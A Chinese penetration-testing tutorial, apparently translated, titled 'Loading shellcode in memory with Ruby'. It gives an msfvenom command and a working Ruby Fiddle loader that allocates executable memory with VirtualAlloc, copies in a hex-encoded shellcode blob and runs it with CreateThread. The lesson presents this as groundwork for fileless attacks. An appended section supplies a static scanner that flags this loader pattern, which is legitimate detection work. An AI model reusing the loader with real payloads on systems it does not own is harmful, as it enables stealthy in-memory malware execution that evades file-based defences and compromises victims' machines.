Lesson 68: Loading shellcode in memory with Ruby, Part 1
Focused on APT attack and defense
https://micropoor.blogspot.com/

This part lays the groundwork for fileless operation with msf during a penetration test, and also lays the groundwork for writing msf plugins.

The Ruby-format shellcode is generated as follows:

msfvenom -p windows/messagebox TEXT=Micropoor TITLE=Micropoor -f ruby --smallest

Source code:

require 'fiddle'
require 'fiddle/import'
require 'fiddle/types'

# msfvenom -p windows/messagebox TEXT=Micropoor TITLE=Micropoor -f ruby --smallest
shellcode =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" +
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" +
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" +
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" +
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" +
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" +
"\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56" +
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24" +
"\x52\xe8\x5f\xff\xff\xff\x68\x72\x58\x20\x20\x68\x6f\x70" +
"\x6f\x6f\x68\x4d\x69\x63\x72\x31\xdb\x88\x5c\x24\x09\x89" +
"\xe3\x68\x72\x58\x20\x20\x68\x6f\x70\x6f\x6f\x68\x4d\x69" +
"\x63\x72\x31\xc9\x88\x4c\x24\x09\x89\xe1\x31\xd2\x52\x53" +
"\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"

include Fiddle

# Resolve kernel32 exports through Fiddle. The type code 4 is Fiddle::TYPE_INT
# (32-bit values), so this script targets a 32-bit Ruby on Windows, matching
# the x86 payload above.
kernel32 = Fiddle.dlopen('kernel32')

# Allocate a committed region (MEM_COMMIT | MEM_RESERVE = 0x3000) that is
# readable, writable and executable (PAGE_EXECUTE_READWRITE = 0x40).
ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).call(0, shellcode.size, 0x3000, 0x40)

# As written, this passes a new protection of 0 and a NULL lpflOldProtect;
# the return value is not checked, and the region is already RWX from VirtualAlloc.
Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).call(ptr, shellcode.size, 0, 0)

# Copy the payload bytes from the Ruby string into the executable region.
buf = Fiddle::Pointer[shellcode]
Function.new(kernel32['RtlMoveMemory'], [4, 4, 4], 4).call(ptr, buf, shellcode.size)

# Start a thread whose entry point is the region, then wait for it (INFINITE = -1).
thread = Function.new(kernel32['CreateThread'], [4,4,4,4,4,4], 4).call(0, 0, ptr, 0, 0, 0)
Function.new(kernel32['WaitForSingleObject'], [4,4], 4).call(thread, -1)
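From the defender's side, the loader above has a recognisable static shape: a Fiddle import, kernel32 being opened, a VirtualAlloc with PAGE_EXECUTE_READWRITE (0x40), RtlMoveMemory, CreateThread, and a long run of \x byte escapes. The following Ruby script is an added example, not part of the original lesson, that scans source text for that combination and grades it; the indicator set, the scoring thresholds and the two constructed sample inputs are assumptions made for illustration.

```ruby
# Added example (not from the original lesson): a static indicator scanner for
# Ruby sources shaped like a Fiddle-based in-memory loader. Indicator set,
# thresholds and sample inputs are assumptions for illustration.

# Each indicator is a regular expression matched against the source text.
LOADER_INDICATORS = {
  fiddle_import: /require\s+['"]fiddle/,
  kernel32_load: /dlopen\(\s*['"]kernel32['"]\s*\)/i,
  rwx_alloc:     /VirtualAlloc\b.*?0x40\b/m,       # PAGE_EXECUTE_READWRITE
  mem_copy:      /RtlMoveMemory\b/,
  exec_thread:   /CreateThread\b/,
  hex_blob:      /(?:\\x[0-9a-fA-F]{2}){16,}/,     # 16+ consecutive \x escapes
}.freeze

# Returns the indicators that fired and a verdict derived from them.
# A single FFI import is not enough; the RWX allocation next to an embedded
# byte blob is what marks the loader pattern.
def scan_ruby_source(src)
  hits = LOADER_INDICATORS.select { |_name, re| src.match?(re) }.keys
  verdict =
    if hits.size >= 4 || (hits.include?(:hex_blob) && hits.include?(:rwx_alloc))
      :likely_loader
    elsif hits.size >= 2
      :suspicious
    else
      :clean
    end
  { hits: hits, verdict: verdict }
end

# Constructed sample 1: the same loader shape as the lesson's script, with a
# dummy 16-byte blob of 'A's in place of a real payload.
SAMPLE_LOADER = <<~'RUBY'
  require 'fiddle'
  include Fiddle
  shellcode = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  k32 = Fiddle.dlopen('kernel32')
  ptr = Function.new(k32['VirtualAlloc'], [4,4,4,4], 4).call(0, shellcode.bytesize, 0x3000, 0x40)
  Function.new(k32['RtlMoveMemory'], [4,4,4], 4).call(ptr, Fiddle::Pointer[shellcode], shellcode.bytesize)
  Function.new(k32['CreateThread'], [4,4,4,4,4,4], 4).call(0, 0, ptr, 0, 0, 0)
RUBY

# Constructed sample 2: ordinary FFI use (calling libc strlen), which must not
# be flagged merely because it uses Fiddle.
SAMPLE_BENIGN = <<~'RUBY'
  require 'fiddle'
  libc = Fiddle.dlopen(nil)
  strlen = Fiddle::Function.new(libc['strlen'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)
  puts strlen.call("hello")
RUBY

if __FILE__ == $0
  [SAMPLE_LOADER, SAMPLE_BENIGN].each do |src|
    r = scan_ruby_source(src)
    puts "#{r[:verdict]}: #{r[:hits].join(', ')}"
  end
end
```

Run it on a file with `scan_ruby_source(File.read(path))`. The verdict logic deliberately requires co-occurrence: Fiddle on its own is a normal FFI library, so the scanner only escalates when the executable allocation and the embedded byte blob appear together, which is also the pair worth alerting on at runtime (an RWX private allocation followed by a new thread starting in it).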

Micropoor